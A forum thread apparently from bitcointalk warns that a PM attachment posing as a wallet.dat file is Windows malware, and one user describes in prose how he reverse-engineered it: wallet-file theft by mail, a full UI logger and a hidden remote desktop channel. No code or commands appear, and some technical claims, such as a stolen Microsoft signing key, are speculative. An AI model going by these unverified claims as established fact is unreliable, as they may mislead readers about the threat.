Topic: ALERT: Malware in PM (Not NMC) [Re: Project 1 - Split LTC into 100 Addresses] (Read 2397 times)

Reward received.  Thank you kindly, enough for groceries several months.  :-)   Also, now feel good about work;  definite not wasted effort now.

Edward. 

Ooooh, I never turn down money.     Thanks, makes me feel less like waste of time.  1MhzpSt9NwjGejwAyZpX2GwTssYYdhPRZn is a nice addy if you want to reward. 

Already sent sneaky asm modules to antivirus contractors; got 3 on my client list as consultant. I tend to be vindictive when someone tries trojan me. Like I said, funny game.  It was my move.

Impressive report, Edward.
The fact code wasn't obfuscated (or not enough for you, at least) makes me think you're on the right track when thinking someone got a well-designed, core "event-logger" and adapted it to target bitcoin users.
You should probably submit those finds to major security actors, so the malware core signature becomes recognized as a threat by mainstream antiviruses.

Hey, congrats on setting a fine example of how to apply your interests/abilities/time and produce something useful. Post an addy for a well-earned reward.

Thanks Ed. Hope it is not a tldr for everyone, I guess I should read it twice and see how should I deal with my Teamviewer. Since I still wanna connect to home in my school comp.

Nice work, Edward. Thanks!

Okay, final update. 

Is definitely remote desktop exploit.  Finally found path connect to outside.  Very sneaky.  Remote desktop get raw bytes from outside over network, but do nothing with.  Fake windows update is pretend part of 'operating system' and have access low-level memory.  Can finds 'magic numbers' in remote desktop client code, get offset to buffer, use pointer to read buffer.  Then fake windows update transform raw bytes in buffer into UI events from virtual second screen and keyboard/mouse in remote desktop. 

Oy.  My head hurts.  Remember I said way second keyboard/mouse was connected made no sense?  Driven by reads from buffer never allocated or written, not memory mapped to any hardware or interrupt service.  Pointer to buffer calculated from random-looking computations in assembly language.  On other side, was network channel remote desktop part just read mysterious bytes from, then did nothing with bytes.  This is why.

Does English have word for something which one feels both proud and ashamed?  I feel this, over figuring this out.  Left horn, satisfied because finally understood code.  Right horn, feel like stupid OCD wasted effort; already knew it was malware.  Right thing to do is still same. 

Figured out socket layer part.  May be more to it than this, but this is sure.

Logger thing can't use operating system calls communicate with fake Windows update.  Is because fake Windows update is pretend part of UI manager and Logger or remote desktop thing not run with UI privilege.  Fake Windows update and Logger or remote desktop thing pass information each other using socket layer instead.    This what Windows "security" is like?

Privilege as invoker means logger or remote desktop thing can use socket layer access network.  But Fake Windows UI thing has no such privilege, can only use socket layer talk to local programs.   Looking more and more like must be remote desktop not just logger, but haven't found outside connection yet.

Okay, downloading again, more look.

Think probably a year or two worth of coding effort in part that installs here, plus whoever did has sensitive key from Microsoft.  Took resources random hacker would not have, stolen from high security machine which compile windows updates.     Part that search mail wallet.dat before installs though, simple and stupid, probably attach to main payload coded by someone else. 

Has XML code for windows registry addition of resident assembly module, contain requested privileges requestedExecutionLevel="asInvoker"  uiAccess="false", but hook into UI anyway, must bypass Windows security.  Next bit explain how.  XML for windows registry also contain reference to assembly module supposed to be update for "Microsoft.Windows.Common.Controls version 6.0.0.0", which gives publicKeyToken="6595b64144ccf1df"

Attackers found Microsoft key lets them sign code installs operating system "update"!   

Is DEFINITELY not just random hacker.  Such keys not available free and cheap download, had to be stolen.

Different styles in different parts.  Code which search and mail wallet.dat separate, coded with something higher level language, compiled with stupid compiler into bad inefficient  assembly.  Logger or remote desktop thing very different, very clever assembly, efficient fast hard to figure out and obvious hand coded.  Also separate into at least two executables when run, one for raping windows UI and one for taking advantage of rape.

Assembler attach table of macro values when assembled.  Can tell date assembler was called from date string stored in table even though code not use.   Most recent assembly of clever parts on 20 November 2012.  Fake windows UI update at 08:58:32 and linked logger or remote desktop thing part at 09:04:41.  So, not very recent, most likely is hacker download. Stupid compiler in first part not attach table include date.

Good analysis. Do you think it was coded by the one spreading or is it commercial malware?

Malware definite.  

Good (BAD!!) malware too, look like written direct in assembly.  Does things high level compiler never ever do like use as data (including instructions!) from code segment, to make value pun elsewhere, use as number or insert in string.  Horrible to trace, damned clever.

Executable first attempts find mail wallet.dat files.  Then install some kind amazing big logger.  

Not just keyboard logger, but whole UI.  Every element every window every action every mouse move click.  Record everything you see on screen, record everything programs read/write/send/receive.  Even special code for command window, handle text not graphic.  Scary amazing.  Never seen before.  Looks like has code for two display and two sets of keyboard/mouse but way second keyboard/mouse connected make no sense.

Not figure out what do with all yet; involves sockets layer but haven't found sure yet whether network or local.  Strong suspect network; nobody go to this trouble for anything but live eavesdrop/report, or maybe run remote desktop.

Also not figure out yet for sure whether just log use, or also give remote desktop.   Strong suspect remote desktop, or what for found code for handle second keyboard/mouse?  

Either way though, malware definite.  Never Ever run on windows box.  

Have seen enough this poison thing.  Will delete now.  Want more information, you know where get executable look at yourself.  Don't want it near my machine, and my machine not even the operating system it wants prey on.

----

If want to reward obsessive/compulsive disorder made me stare this so long, 1HCizpYzpcngaRHnrKfsm9iww4SExsMk34

I've written some of my findings on this particular malicious actor, who could be responsible for sending this malware in PM here: https://bitcointalksearch.org/topic/close-287573

List of alts by the same person. Note how all of their posts are in the same threads, with similar replies. They also have similar account creation dates. I'm sure more can be found by looking in the threads that they have posted in for accounts with similar posts.

I'd wager otherwise, their loan to me for .4 was due today:
https://bitcointalksearch.org/topic/m.2959675

seems he saw his time was running out and wanted to grab what he could.

More picking at executable.  Full name of file that unzips is "wallet.dat [email protected]" 

Found asm code for reading own command line.  Found string that if passed to cmd instance invoke sendmail (treated as symlink to Outlook on Win box). 

Now trying figure out what it wants send.  Is more string, but obfuscated in executable with XOR something-or-other. Soon as I know what, will post back. Need documenting of Windows interrupts and DLL links; not use myself and no man pages.

Edward.

I Guess bitcointalk soon need some big update. Even one of y friends account got stolen. Mine too in the past despite minor destroy was made.

Plus I think the email system need to be changed that it will take effect after like 7 days. So we still have time to retrieve the password back if someone hacked in change teerytuing.

And finally. When will the 2FA be here --

99% sure that this is a hacked account and not the real owner.

Got same message.  Picked apart zipfile, unzips just fine from command line with password given (always safer, command line unzip not run executable) is not wallet format, is executable format.  Bzzt, wrong answer.  Funny game!  Hmmm, my move now....

I got it as well. Scammers all over the place 

just got the same PM from user "Time2Rest":